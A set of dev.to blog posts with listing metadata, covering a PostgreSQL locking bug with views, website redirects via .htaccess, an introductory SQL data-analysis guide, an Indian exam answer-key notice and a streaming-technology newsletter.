The CSS positioning properties give structure to your designs and make reviewing the content on a web page more accessible. So, be intentional with CSS positioning, and the results will blow your mind! However, mastering CSS takes regular practice. Keep honing your skills, and you’ll get better at it in time. Learn more about CSS positioning properties such as [CSS float and clear](https://code.pieces.app/blog/fundamentals-of-the-css-float-and-clear-properties), or [how to style text in CSS](https://code.pieces.app/blog/styling-text-in-css) on your site. | get_pieces |
1,344,275 | PostgreSQL: ⚠ when locking though views (TL;DR: test for race conditions and check execution plan with BUFFERS, VERBOSE) | In theory, in a relational database, you should be able to interact (any DML) with all tables through... | 0 | 2023-02-02T17:44:35 | https://dev.to/aws-heroes/postgresql-when-locking-though-views-tldr-test-for-race-conditions-and-check-execution-plan-with-buffers-verbose-28je | postgres, sql, lock, view | In theory, in a relational database, you should be able to **interact (any DML) with all tables through a view**. But there may be some implementation details, limitations, or bugs changing the behavior. This means that, if you are doing some tricky things through a view, you should **test them carefully**. However, be aware that unit tests are not sufficient. You must validate the **concurrent session conflicts behavior**: isolation levels and implicit and explicit locking.
I'm taking an example that can be reproduced in the latest PostgreSQL. I've also tested on Amazon Aurora with PostgreSQL 14.6 compatibility, this is where I've taken the output for this blog post.
## Connect from `psql`
I connect to it with all connection information in environment variables:
```
$ PGHOST=pg.cluster-...eu-west-1.rds.amazonaws.com psql
psql (14.5, server 14.6)
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.
postgres=> select inet_server_addr();
inet_server_addr
------------------
172.31.42.200
(1 row)
postgres=> \! psql -c "select inet_server_addr()"
inet_server_addr
------------------
172.31.42.200
(1 row)
```
The point of the above connection test is to verify that I can connect two sessions to the same database through `\! psql`, as the environment variables are propagated to the child process.
## Create small tables for the test
I create a demo table and a VIEW on it with a UNION ALL:
```sql
create table demo_table
as select generate_series(1,3) as id , 0 as value;
vacuum analyze demo_table;
CREATE OR REPLACE VIEW demo_view AS
select id,value from demo_table where mod(id,2)=0
union all
select id,value from demo_table where mod(id,2)=1
;
```
## Simple test case with two sessions
I'll run a transaction with two SELECT FOR UPDATE on the demo table, but through the VIEW. This is implicit locking when we want to read the latest state (rather than an MVCC snapshot). It blocks any concurrent changes on those rows, to guarantee that the state that was read is still the latest.
While the transaction is still ongoing, I start another session (calling `psql` with `\!` - my connection credentials are all in the environment) to run an update of those rows. This is a very simple way to test with two sessions. I expect that it waits for the completion of the ongoing transaction (pessimistic locking):
```sql
begin transaction;
select * from demo_view for update;
\! psql -ec "UPDATE demo_table SET value = 1"
select * from demo_view for update;
rollback;
```
However, here is the result:
```
postgres=# select version();
version
-----------------------------------------------------------------------------------------------------------------------------------
PostgreSQL 13.7 on aarch64-unknown-linux-gnu, compiled by aarch64-unknown-linux-gnu-gcc (GCC) 7.4.0, 64-bit
(1 row)
postgres=# begin transaction;
BEGIN
postgres=*# select * from demo_view for update;
id | value
----+-------
2 | 0
1 | 0
3 | 0
(3 rows)
postgres=*# \! psql -ec "UPDATE demo_table SET value = 1"
Pager usage is off.
UPDATE demo_table SET value = 1
UPDATE 3
postgres=*#
postgres=*# select * from demo_view for update;
id | value
----+-------
2 | 1
1 | 1
3 | 1
(3 rows)
postgres=*# rollback;
ROLLBACK
```
The UPDATE didn't wait for the SELECT FOR UPDATE, and the two SELECTs in the same transaction do not show the same state. Obviously, this is a bug. I filed [BUG #17770](https://www.postgresql.org/message-id/17770-f9e90c19d082a231%40postgresql.org).
## Execution plan
The goal of this blog post is to raise awareness of what can happen, and can be missed, if race conditions are not tested. The bug can be reported to the PostgreSQL mailing list, or to the managed service support in the case of Aurora.
As mentioned, the best approach is to test all expected race conditions. Another way is to look at the execution plan, which exposes some of the implementation details, as it may give a clue about what can go wrong:
```
postgres=# explain (verbose, analyze, buffers)
select * from demo_view for update;
QUERY PLAN
------------------------------------------------------------------------------------------------------------------------------------------
LockRows (cost=0.00..2.14 rows=2 width=40) (actual time=0.011..0.018 rows=3 loops=1)
Output: "*SELECT* 1".id, "*SELECT* 1".value, (ROW("*SELECT* 1".id, "*SELECT* 1".value))
Buffers: shared hit=2
-> Append (cost=0.00..2.12 rows=2 width=40) (actual time=0.011..0.016 rows=3 loops=1)
Buffers: shared hit=2
-> Subquery Scan on "*SELECT* 1" (cost=0.00..1.05 rows=1 width=40) (actual time=0.011..0.012 rows=1 loops=1)
Output: "*SELECT* 1".id, "*SELECT* 1".value, ROW("*SELECT* 1".id, "*SELECT* 1".value)
Buffers: shared hit=1
-> Seq Scan on public.demo_table (cost=0.00..1.04 rows=1 width=8) (actual time=0.008..0.009 rows=1 loops=1)
Output: demo_table.id, demo_table.value
Filter: (mod(demo_table.id, 2) = 0)
Rows Removed by Filter: 2
Buffers: shared hit=1
-> Subquery Scan on "*SELECT* 2" (cost=0.00..1.05 rows=1 width=40) (actual time=0.002..0.003 rows=2 loops=1)
Output: "*SELECT* 2".id, "*SELECT* 2".value, ROW("*SELECT* 2".id, "*SELECT* 2".value)
Buffers: shared hit=1
-> Seq Scan on public.demo_table demo_table_1 (cost=0.00..1.04 rows=1 width=8) (actual time=0.001..0.002 rows=2 loops=1)
Output: demo_table_1.id, demo_table_1.value
Filter: (mod(demo_table_1.id, 2) = 1)
Rows Removed by Filter: 1
Buffers: shared hit=1
Query Identifier: -1810003173879754115
Planning Time: 0.083 ms
Execution Time: 0.050 ms
(24 rows)
```
I displayed BUFFERS, which shows that the `LockRows` is actually touching some data. I also displayed VERBOSE, which shows which columns are available in the rowset operation: `"*SELECT* 1".id, "*SELECT* 1".value, (ROW("*SELECT* 1".id, "*SELECT* 1".value))`. This looks like a temporary table built from the result. How can the `LockRows` find which rows to lock without a `ctid`?
An execution plan when doing the same on the table rather than the view shows `id, value, ctid`:
```
QUERY PLAN
------------------------------------------------------------------------------------------------------------------
LockRows (cost=0.00..1.06 rows=3 width=14) (actual time=0.055..0.063 rows=3 loops=1)
Output: id, value, ctid
Buffers: shared hit=4
-> Seq Scan on public.demo_table (cost=0.00..1.03 rows=3 width=14) (actual time=0.007..0.008 rows=3 loops=1)
Output: id, value, ctid
Buffers: shared hit=1
Query Identifier: -5183708313868986861
Planning:
Buffers: shared hit=3
Planning Time: 0.071 ms
Execution Time: 0.083 ms
(11 rows)
```
I'm convinced that, in addition to tests covering the expected race conditions, the execution plan should be verified for non-trivial queries. You need to trust the query execution before releasing it into production, because those kinds of anomalies are rare, the wrong results are not immediately visible, and the troubleshooting is very difficult. It also helps to think about how it could work: FOR UPDATE applies to the table rows, not to the result set, and a UNION ALL can come from many tables.
I got the heads up on this case from a colleague checking an optimization suggested by a user. He did the right thing: checking lock behavior. As he is implementing the locking mechanisms in YugabyteDB, you can see the high quality of engineering. The PostgreSQL compatibility of YugabyteDB, like Amazon Aurora, inherits the same behavior, so be careful and avoid SELECT FOR UPDATE on UNION ALL views.
| franckpachot |
1,366,949 | Redirect einer Webseite - Mittel und Wege zum Thema | Redirect einer Webseite; Bei Redirect handelt es sich um eine server-seitige beziehungsweise um eine... | 0 | 2023-02-15T17:25:45 | https://dev.to/digital_hub/redirect-einer-webseite-mittel-und-wege-zum-thema-4o8m | apache, php, linux |
Redirecting a website:
A redirect is a server-side or client-side forwarding in which one URL is, in effect, routed to another.
You could also say that one URL points to another URL. What really happens here, and how does it work technically?
Webmasters can implement these URL-to-URL redirects with several different methods:
**1. Via the .htaccess file:**
This method sets up so-called redirects through the .htaccess file.
This happens fairly "silently" and goes more or less unnoticed by the user.
Beyond that, there are further options:
**2. A redirect via a 3xx status code**
This method takes a different route: here, the server returns a so-called 3xx status code.
This is always a form of forwarding in which one domain points to another domain,
meaning that one URL is redirected to a further URL.
In general, there are several such methods. Which redirect variant is used depends on the goal and
purpose, in other words, on what you want the redirect to achieve.
The **301 redirect** method:
This is the method to use when you want to redirect a URL or a domain according to the so-called 301 method.
It is a very popular approach.
A 301 redirect is, in practice, a permanent redirect.
The server returns the status "moved permanently", which is typical of this redirect method.
It is widely used and fits many use cases, for example when you want to:
a. redirect from one domain to another, for example after a domain move;
b. redirect from one folder to another, for example after restructuring the site;
c. redirect as part of a protocol change, for example
from http to https. This also comes up quite often, and the method is very popular.
One more thing to keep in mind: to create a redirect, you need an entry in the .htaccess file.
This entry lives in a file stored directly in the root directory of an Apache server.
The .htaccess text file has a simple structure and can be created and edited with an ordinary text editor.
Let's turn to the advantages and disadvantages:
One of the big advantages of a 301 redirect is that the forwarding happens almost invisibly and, so to speak, "silently"; the user hardly notices it.
However, since every redirect is loaded from the .htaccess on each server request, webmasters should keep the number of permanent redirects small so as not to increase the page's load time unnecessarily.
The essential parts of the .htaccess file:
For the redirect to work, the server's mod_rewrite module must be enabled.
Next, the file states the domain base on which the redirect operates.
After that, the type of redirect is specified;
various directives are available to define it more precisely.
This applies to all variants of 3xx redirects.
Here is a small example of what the .htaccess file can look like:
```
RewriteEngine On
RewriteBase /
RewriteRule seite1.html seite2.html [R=301]
```
With a rule like this, page A (`seite1.html`) is permanently redirected to
page B (`seite2.html`) on every server request. This approach is very popular.
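To see what a permanent redirect looks like on the wire, here is a minimal, hypothetical Python sketch (standard library only, illustrative paths `/old` and `/new`) that serves a 301 and fetches it with a client that follows redirects, just as a browser would:

```python
import http.server
import threading
import urllib.request

class RedirectHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/old":
            self.send_response(301)             # permanent redirect
            self.send_header("Location", "/new")
            self.end_headers()
        else:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"new page")

    def log_message(self, *args):  # silence request logging
        pass

# Bind to an ephemeral localhost port and serve in the background.
server = http.server.HTTPServer(("127.0.0.1", 0), RedirectHandler)
port = server.server_address[1]
threading.Thread(target=server.serve_forever, daemon=True).start()

# urllib follows the 301 automatically, like a browser.
with urllib.request.urlopen(f"http://127.0.0.1:{port}/old") as resp:
    body = resp.read()
    final_url = resp.geturl()
server.shutdown()
print(final_url, body)
```

The client ends up on `/new` with the content of the new page, without the user doing anything.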
**302 redirect**
A 302 redirect (also called "Moved Temporarily") is a convenient way to redirect a URL.
It works by forwarding visitors directly to the new URL when the browser requests the old one.
It is a very popular method and is often used for redirects.
Compared with the 301 redirect, the 302 is only used for temporary redirecting, which limits its use cases, for example when a URL is only live temporarily.
Finally, let's look at one more method, the so-called 307 redirect:
**307 redirect**
Forwarding via the 307 redirect method
is well suited for server maintenance. This form of URL redirecting can also be used for geotargeting, to forward users to the correct country version of a site based on their IP address.
| digital_hub |
1,367,432 | SQL101: Introduction to SQL for Data Analysis | Introduction SQL (Structured Query language) is an essentially powerful tool for Data Analysts. It is... | 0 | 2023-02-18T06:33:24 | https://dev.to/njenga98/sql101-introduction-to-sql-for-data-analysis-4lh5 | sql, datascience, database, datanewbie | **Introduction**
SQL (Structured Query Language) is an essential and powerful tool for data analysts. It is very helpful when working with data held in relational databases.
SQL is useful for accessing and manipulating data, allowing data analysts to extract valuable insights and make informed decisions. Techniques in SQL for data analysis include: retrieving data, filtering data, joining tables, aggregating data, and creating tables.
**Data Analysis**
Data analysis is an undertaking that involves inspection, cleaning, transforming, and modeling data to obtain useful insights for effective decision-making. Various techniques and methods are employed to identify patterns, trends, and relationships in the data.
**Relational databases**
This is a type of database that stores and sorts data in a collection of related tables. It consists of one or more tables, each with a unique name, and each table consists of columns and rows.
**What is SQL?**
Pronounced "Sequel", SQL is a special-purpose programming language used to manage and manipulate data in relational databases.
**History of SQL**
SQL was first developed in the early 1970s by Raymond F. Boyce and Donald D. Chamberlin, who were IBM researchers. They had been working on a project referred to as System R, a prototype relational database management system (RDBMS). The goal was to build a new type of database that would be more user-friendly and flexible than existing databases.
SQL was created with the user in mind, allowing both technical and non-technical users to interact with relational databases. It was based on the principles of relational algebra and set theory, and was designed as a declarative language, meaning users specify what they want the database to do rather than how to do it.
In the 1980s, SQL was adopted as the language for accessing and manipulating data in relational databases. In 1986, the first official SQL standard was published by ANSI (American National Standards Institute) and later adopted as an international standard by ISO (International Organization for Standardization).
**Why SQL for data analysis and not other technologies**
SQL has grown in popularity as an effective data analysis tool for various reasons. These are:
1. Flexibility – SQL offers a high degree of flexibility in data analysis. It can be used to extract data, filter data, aggregate data, and join data from multiple tables.
2. Efficient querying – SQL allows for efficient querying of large datasets enabling analysts to extract relevant data needed for analysis quickly.
3. Reproducibility – SQL scripts can be saved and reused making it easier to reproduce analyses and ensure that the results are consistent over time.
4. Standardization – SQL is a standardized language used by many different database management systems
5. Scalability – SQL is suitable to work with large datasets which are increasingly vital as the data volume being generated keeps growing.
6. Data manipulation – SQL allows for data manipulation such as adding, updating, or deleting data in a database. This offers an efficient way to clean and prepare data for analysis.
7. Accessibility – SQL tools are easily available for free to any user.
**Components of SQL**
SQL (Structured Query Language) is a domain-specific programming language used for managing and manipulating relational databases. It comprises several components, including:
1. Data Definition Language (DDL): DDL is used to define and manage the structure of the database, including tables, views, indexes, and other database objects. Common DDL statements include CREATE, ALTER, and DROP.
2. Data Manipulation Language (DML): DML is used to manipulate data within the database, including inserting, updating, and deleting records. Common DML statements include INSERT, UPDATE, and DELETE.
3. Data Query Language (DQL): DQL is used to query the database and retrieve data from one or more tables. The most common DQL statement is SELECT.
4. Transaction Control Language (TCL): TCL is used to manage transactions within the database. Common TCL statements include COMMIT, ROLLBACK, and SAVEPOINT.
5. Data Control Language (DCL): DCL is used to control access to the database and its objects. Common DCL statements include GRANT, REVOKE, and DENY.
6. Data Administration Language (DAL): DAL is used to manage the security, backup, and recovery of the database. Common DAL statements include BACKUP, RESTORE, and CREATE USER.
Each of these components plays a critical role in managing and manipulating data within a relational database. By leveraging these components, developers, data scientists, and analysts can work with data in a structured, efficient, and secure manner.
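As a quick, self-contained illustration of several of these components working together (DDL, DML, DQL, and TCL), here is a minimal Python sketch using the standard library's sqlite3 module; the `customers` table and its columns are hypothetical:

```python
import sqlite3

# In-memory database; the customers table and its columns are illustrative.
conn = sqlite3.connect(":memory:")
cur = conn.cursor()

# DDL: define the structure of the database
cur.execute("CREATE TABLE customers (customer_id INTEGER PRIMARY KEY, customer_name TEXT)")

# DML: manipulate data within the database
cur.execute("INSERT INTO customers (customer_name) VALUES ('Alice')")
cur.execute("INSERT INTO customers (customer_name) VALUES ('Bob')")
conn.commit()    # TCL: make the inserts permanent

# TCL: roll back an uncommitted change
cur.execute("DELETE FROM customers")
conn.rollback()  # the committed rows survive

# DQL: query the database and retrieve data
cur.execute("SELECT customer_name FROM customers ORDER BY customer_id")
names = [row[0] for row in cur.fetchall()]
print(names)  # ['Alice', 'Bob']
conn.close()
```

Note that SQLite does not implement every component listed above (for example, GRANT/REVOKE from DCL), but the same statements apply in full RDBMSs such as PostgreSQL or MySQL.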
**SQL Techniques used in Data Analysis**
Understanding how the SQL components work is an essential skill for any data analyst or data scientist. To analyze data effectively in SQL, a variety of techniques are used. These are:
1. **SELECT Statements**
This is the most basic SQL command, used to retrieve data from a database. Users can specify which columns they want to retrieve and which table to retrieve them from. Below is a code snippet of how the SELECT statement is used:
```sql
-- Select all columns from a table
SELECT * FROM customers;
-- Select specific columns from a table
SELECT customer_id, customer_name, email FROM customers;
-- Select a calculated column
SELECT order_id, order_date, total_amount, total_amount * 0.2 AS tax_amount FROM orders;
```
2. **Aggregation**
SQL provides several functions for summarizing data, such as COUNT, SUM, AVG, MAX, and MIN. These functions can be used to group and analyze data based on different conditions, as shown below:
```sql
-- Count the number of rows in a table
SELECT COUNT(*) FROM orders;
-- Calculate the average order amount
SELECT AVG(total_amount) FROM orders;
-- Group orders by customer and calculate the total order amount for each customer
SELECT customer_id, SUM(total_amount) FROM orders GROUP BY customer_id;
```
3. **Joins**
Joins are used to combine data from two or more tables based on common columns or keys.
There are several types of joins: INNER JOIN, LEFT JOIN, RIGHT JOIN, and FULL OUTER JOIN.
An example of how to use joins during analysis:
```sql
-- Inner join two tables
SELECT orders.order_id, customers.customer_name
FROM orders
INNER JOIN customers ON orders.customer_id = customers.customer_id;
-- Left join two tables
SELECT customers.customer_name, orders.total_amount
FROM customers
LEFT JOIN orders ON customers.customer_id = orders.customer_id;
-- Full outer join two tables
SELECT *
FROM customers
FULL OUTER JOIN orders ON customers.customer_id = orders.customer_id;
```
4. **Subqueries**
A subquery is a query within a query. It allows a user to extract data from a table based on conditions derived from another table. For example:
```sql
-- Select all customers with orders in the past month
SELECT customer_name
FROM customers
WHERE customer_id IN (
    SELECT customer_id
    FROM orders
    WHERE order_date > DATEADD(month, -1, GETDATE())
);
-- Select all orders with a total amount greater than the average order amount
SELECT order_id, total_amount
FROM orders
WHERE total_amount > (
    SELECT AVG(total_amount)
    FROM orders
);
```
5. **Conditional Statements**
SQL offers conditional expressions and functions for conditional calculations or data manipulation, such as IF, CASE, and COALESCE. For example:
```sql
-- Create a new column that indicates whether an order is a large order or a small order
SELECT order_id, total_amount,
    CASE
        WHEN total_amount > 1000 THEN 'Large Order'
        ELSE 'Small Order'
    END AS order_size
FROM orders;
-- Replace null values in a column with a default value
SELECT order_id, COALESCE(order_notes, 'No notes') AS order_notes
FROM orders;
```
6. **Data Cleansing**
SQL can be used to clean and manipulate data using techniques such as trimming, filtering, and replacing values. For example:
```sql
-- Remove leading and trailing spaces from a column
SELECT TRIM(customer_name) FROM customers;
-- Filter out orders with a total amount of less than 10
SELECT * FROM orders WHERE total_amount >= 10;
-- Replace null values in a column with a specific value
SELECT order_id, REPLACE(ISNULL(order_notes, ''), 'N/A', 'No notes available') AS order_notes
FROM orders;
```
These are just a few of the techniques an analyst can use to analyze data effectively and derive useful insights from it.
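To try several of these techniques end to end without setting up a database server, here is a minimal Python sketch using the built-in sqlite3 module; the schema and values are hypothetical, mirroring the examples above:

```python
import sqlite3

# Hypothetical schema and values mirroring the examples above.
conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.executescript("""
CREATE TABLE customers (customer_id INTEGER PRIMARY KEY, customer_name TEXT);
CREATE TABLE orders (order_id INTEGER PRIMARY KEY, customer_id INTEGER, total_amount REAL);
INSERT INTO customers VALUES (1, 'Alice'), (2, 'Bob');
INSERT INTO orders VALUES (101, 1, 1200.0), (102, 1, 50.0), (103, 2, 300.0);
""")

# One query combining a join, an aggregate, and a CASE expression.
cur.execute("""
SELECT c.customer_name,
       SUM(o.total_amount) AS total_spent,
       CASE WHEN SUM(o.total_amount) > 1000 THEN 'Large' ELSE 'Small' END AS segment
FROM customers c
INNER JOIN orders o ON c.customer_id = o.customer_id
GROUP BY c.customer_id
ORDER BY c.customer_id
""")
results = cur.fetchall()
print(results)  # [('Alice', 1250.0, 'Large'), ('Bob', 300.0, 'Small')]
conn.close()
```

The same query text runs largely unchanged against PostgreSQL or MySQL, which is the portability benefit of SQL's standardization.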
**Models Used in SQL for Data Analysis**
To derive insights from data effectively, SQL models are used to structure data for efficient querying and to perform calculations and aggregations. These models are:
• Relational Model: The relational model is the foundation of SQL, and it represents data as a set of tables with rows and columns. The tables are related to each other by key fields, and SQL can be used to join tables, filter data, and perform aggregations.
• Dimensional Model: The dimensional model is a specialized data model used in data warehousing. It represents data as facts and dimensions, with facts representing the measurable data (such as sales or revenue) and dimensions representing the categories or attributes that define the facts (such as time or product). SQL can be used to build and query dimensional models.
• OLAP (Online Analytical Processing) Model: The OLAP model is a data model used for multidimensional analysis, such as pivot tables or data cubes. It represents data as dimensions and measures, and SQL can be used to build and query OLAP models.
• Regression Model: Regression is a statistical model used to identify the relationship between one or more independent variables and a dependent variable. SQL can be used to build regression models, which can help to predict future outcomes based on historical data.
• Time Series Model: Time series analysis is a statistical technique used to analyze data that varies over time. SQL can be used to build time series models, which can help to identify patterns and trends in time-based data.
• Text Mining Model: Text mining is a process of extracting useful information from unstructured text data. SQL can be used to build text mining models, which can help to analyze text data and extract insights, such as sentiment analysis or topic modeling.
**Importance of SQL in Data Analysis**
SQL plays a vital role in data analysis by providing a robust and standardized set of tools for retrieving, transforming, and summarizing data in relational databases. These roles are:
1. Data retrieval: SQL is used to retrieve data from databases. Analysts can use SQL to write queries that extract specific data from a database, which can then be analyzed and visualized using other tools.
2. Data transformation: SQL can be used to transform data, such as filtering, grouping, and aggregating data, to prepare it for analysis. SQL's capabilities for data transformation are essential for data cleaning and preparation, which is a crucial step in the data analysis process.
3. Data aggregation and summarization: SQL provides several functions for aggregating and summarizing data, such as COUNT, SUM, AVG, MAX, and MIN. These functions are essential for summarizing and understanding the characteristics of large datasets.
4. Joining multiple tables: SQL provides powerful join capabilities that enable analysts to combine data from multiple tables. Joining tables is a critical step in data analysis, especially for large datasets.
5. Data visualization: SQL can be used to retrieve and summarize data, which can then be visualized using other tools. Data analysts can use SQL to create the underlying data for charts, graphs, and other visualizations.
6. Data modeling: SQL can be used to create and manage data models, which define the structure and relationships of data in a database. Data modeling is an essential step in designing databases that are optimized for data analysis.
From these roles, a list of use cases can be derived. Some real-world examples of how SQL can be used in data analysis are:
1. E-commerce analysis: E-commerce businesses use SQL to analyze customer behavior, such as purchase history, shopping cart behavior, and website navigation. This information is used to optimize the user experience, recommend products, and personalize marketing messages. For example, an e-commerce company may use SQL to analyze shopping cart data and identify the most commonly abandoned items, allowing them to adjust pricing or shipping costs to reduce cart abandonment rates.
2. Financial analysis: Financial institutions use SQL to analyze customer transactions, such as deposit and withdrawal history, credit card usage, and loan payment behavior. This information is used to identify potential fraud, assess credit risk, and optimize lending decisions. For example, a bank may use SQL to analyze customer transaction history and identify patterns of suspicious behavior, such as unusual transactions or high-risk purchases.
3. Healthcare analysis: Healthcare organizations use SQL to analyze patient data, such as medical history, treatment outcomes, and healthcare utilization. This information is used to improve patient care, optimize healthcare delivery, and manage costs. For example, a hospital may use SQL to analyze patient outcomes for a particular treatment, allowing them to adjust treatment protocols to improve patient outcomes and reduce costs.
4. Marketing analysis: Marketing teams use SQL to analyze customer demographics, behavior, and preferences. This information is used to optimize marketing campaigns, personalize messaging, and improve customer retention. For example, a marketing team may use SQL to analyze customer purchase history and identify patterns in product preferences, allowing them to create targeted campaigns and promotions for specific customer segments.
5. Supply chain analysis: Supply chain companies use SQL to analyze inventory levels, logistics data, and shipping history. This information is used to optimize operations, reduce costs, and improve delivery times. For example, a logistics company may use SQL to analyze shipping data and identify patterns in delivery times, allowing them to adjust routes and schedules to improve efficiency and reduce costs.
**Merits and Demerits of using SQL for data analysis**
While SQL is a very powerful tool for data analysis, it has its strengths and weaknesses. How effective SQL is depends on how well it aligns with the needs of a company.
**Merits:**
1. Speed: SQL is a fast and efficient language for retrieving, transforming, and summarizing data, and it can quickly process large datasets.
2. Standardization: SQL is a standard language used across many different relational database management systems, which makes it easy to learn and widely applicable.
3. Data Integration: SQL provides powerful join capabilities that allow analysts to combine data from multiple tables or even multiple databases. This makes it easier to integrate and analyze data from multiple sources.
4. Data Transformation: SQL provides a range of functions for data transformation, which can be used to clean and prepare data for analysis. These functions make it easier to standardize data and prepare it for analysis.
5. Security: SQL provides robust security features, including user authentication and access control, which help to protect sensitive data from unauthorized access.
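The data integration and transformation merits above can be shown in one short query. Again, the schema is invented for the sketch and SQLite keeps it runnable anywhere:

```python
import sqlite3

# Made-up schema: customers joined to their orders.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE customers (id INTEGER, name TEXT);
    CREATE TABLE orders (customer_id INTEGER, amount REAL);
    INSERT INTO customers VALUES (1, 'Ada'), (2, 'Bob');
    INSERT INTO orders VALUES (1, 20.0), (1, 5.0), (2, 12.5);
""")

# Join two tables and aggregate: integration and
# transformation in a single statement.
rows = conn.execute("""
    SELECT c.name, SUM(o.amount) AS total_spent
    FROM customers c
    JOIN orders o ON o.customer_id = c.id
    GROUP BY c.name
    ORDER BY total_spent DESC
""").fetchall()
print(rows)  # → [('Ada', 25.0), ('Bob', 12.5)]
```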
**Demerits:**
1. Limited to Relational Databases: SQL is designed to work with relational databases and cannot be used to analyze data stored in other types of databases or data sources.
2. Limited Functionality: Although SQL provides a wide range of functions for data manipulation, it may not have all the functionality required for complex data analysis.
3. Complexity: SQL can be a complex language to learn, especially for those who are new to programming or have limited experience working with databases.
4. Maintenance: Maintaining a database and ensuring that it is up to date can be time-consuming and resource-intensive.
5. Requires Technical Expertise: To use SQL effectively, analysts require technical expertise in database design, data modeling, and SQL query writing.
**Conclusion**
SQL is a powerful tool for a data analyst, and its merits outweigh its demerits.
| njenga98 |
1,371,258 | SSC GD Constable Answer Key 2023: Check Your Answers Now! | SSC GD Constable Answer Key 2023 Date: Staff Selection Commission (SSC) has released the answer key... | 0 | 2023-02-19T05:41:15 | https://dev.to/lovehacker/ssc-gd-constable-answer-key-2023-check-your-answers-now-dll | ssc, result | SSC GD Constable Answer Key 2023 Date: Staff Selection Commission (SSC) has released the answer key of SSC GD Constable Exam 2023 today i.e. on 18 February 2023 on its official website. Candidates who have appeared for the exam can download the answer key now and check their answers. The downloading process is given below, by following which candidates can download their answer key. SSC GD Constable exam was conducted between January 10 to February 14, 2023, in which a total of 30,41,284 candidates appeared.
Let us tell you that this GD Constable Exam was conducted for a total of 45284 posts, out of which 4835 posts are for female constables and 40274 posts are for male constables. This exam of SSC GD Constable is conducted for the recruitment of Central Armed Police Forces (CAPF), NIA, SSF and Rifleman (GD) in Assam Rifles. In which a total of 52,20,335 candidates applied for the exam and 30,41,284 candidates appeared in the exam.
Candidates can download SSC GD Constable Answer Key from the official website of SSC, ssc.nic.in. The answer key contains the correct answers to all the questions asked in the exam. Candidates can use the answer key to calculate their probable score in the exam and get an idea of their chances of qualifying for the next round.
How to download SSC GD Constable Answer Key 2023
1. First of all go to ssc.nic.in.
2. Now click on the “Answer Key” section on the homepage.
3. Now click on “SSC GD Constable Answer Key 2023”.
4. Now submit the form by entering your login credentials like roll number, password and exam date.
5. Now the option to download PDF file of Answer Key is visible.
6. After downloading the Answer Key PDF, take a printout for future reference.
After checking the [SSC GD Constable Answer Key 2023](https://hindi.wordlex.org/sarakari-result/ssc-gd-constable-answer-key-2023-date/), if candidates find any discrepancy in the answer key, they can apply for objection before 25 February. The fee for one objection has been kept at Rs 100. Candidates can submit objections with their valid proof.
Read such latest breaking news in Hindi only on [WordleX News Hindi](https://hindi.wordlex.org/). Read today's latest news 2023, about exams, live news updates on the world's most trusted website WordleX News Hindi. | lovehacker |
1,372,816 | FLiP-FLaNK Stack Weekly 20-February-2023 | 20-February-2023 FLiPN-FLaNK Stack Weekly Welcome to the seventh newsletter... | 0 | 2023-02-20T16:18:24 | https://dev.to/tspannhw/flip-flank-stack-weekly-20-february-2023-f86 | apachepulsar, apacheflink, apacenifi, apachekafka | ## 20-February-2023
### FLiPN-FLaNK Stack Weekly

Welcome to the seventh newsletter of 2023. Getting closer...
Tim Spann @PaaSDev
Happy President's Day.

The new stuff in NiFi 1.20 is incredible, and what is coming is unreal. I got some secret early looks at upcoming features and I can't wait to show them at some talks in March.
[https://www.timswarmercabel.com/](https://www.timswarmercabel.com/)
Upcoming talk at Spring / VMWare / Tanzu

[https://tanzu.vmware.com/developer/tv/golden-path/6/](https://tanzu.vmware.com/developer/tv/golden-path/6/)
[https://www.youtube.com/@VMwareTanzu](https://www.youtube.com/@VMwareTanzu)
<iframe width="560" height="315" src="https://www.youtube.com/embed/f2HsqchP2_A" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
[https://youtu.be/f2HsqchP2_A](https://youtu.be/f2HsqchP2_A)
## PODCAST
New podcast coming.
## CODE + COMMUNITY
Join my meetup group NJ/NYC/Philly/Virtual.
[https://www.meetup.com/new-york-city-apache-pulsar-meetup/](https://www.meetup.com/new-york-city-apache-pulsar-meetup/)
[https://www.meetup.com/futureofdata-princeton/](https://www.meetup.com/futureofdata-princeton/)
**This is Issue #71!!**
[https://github.com/tspannhw/FLiPStackWeekly](https://github.com/tspannhw/FLiPStackWeekly)
[https://www.linkedin.com/pulse/schedule-2023-tim-spann-/](https://www.linkedin.com/pulse/schedule-2023-tim-spann-/)

## Meetup
[http://www.meetup.com/futureofdata-princeton/](http://www.meetup.com/futureofdata-princeton/)
[https://www.meetup.com/phillyjug/events/291103971/](https://www.meetup.com/phillyjug/events/291103971/)
## New

## Articles
[https://blog.cloudera.com/getting-started-with-cloudera-stream-processing-community-edition/](https://blog.cloudera.com/getting-started-with-cloudera-stream-processing-community-edition/)
[https://www.kschaul.com/post/2023/02/16/how-the-post-is-replacing-mapbox-with-open-source-solutions/](https://www.kschaul.com/post/2023/02/16/how-the-post-is-replacing-mapbox-with-open-source-solutions/)
[https://policylab.rutgers.edu/report-release-garden-state-open-data-index/](https://policylab.rutgers.edu/report-release-garden-state-open-data-index/)
[https://hubertdulay.substack.com/p/stream-processing-vs-real-time-olap](https://hubertdulay.substack.com/p/stream-processing-vs-real-time-olap)
## Events
Feb 17, 2023: Spring One: Virtual and VoD
[https://tanzu.vmware.com/developer/tv/golden-path/6/](https://tanzu.vmware.com/developer/tv/golden-path/6/)
Feb 21, 2023: Summit for Java Dev: Virtual
[https://geekle.us/schedule/java23](https://geekle.us/schedule/java23)
Feb 23, 2023: Pulsar Meetup - Rising Wave + Pulsar: Virtual
[https://www.meetup.com/new-york-city-apache-pulsar-meetup/events/291048765/](https://www.meetup.com/new-york-city-apache-pulsar-meetup/events/291048765/)
March 3, 2023: Spring One: Virtual
[https://tanzu.vmware.com/developer/tv/](https://tanzu.vmware.com/developer/tv/)
March 8, 2023: Cloudera Now: Virtual
[https://www.cloudera.com/about/events/cloudera-now-cdp.html](https://www.cloudera.com/about/events/cloudera-now-cdp.html)
March 9, 2023: Hazelcast Unconference: Virtual
[https://hazelcast.com/lp/unconference/](https://hazelcast.com/lp/unconference/)
March 15, 2023: Philly JUG Meetup: Philly
[https://www.meetup.com/phillyjug/events/291103971/](https://www.meetup.com/phillyjug/events/291103971/)
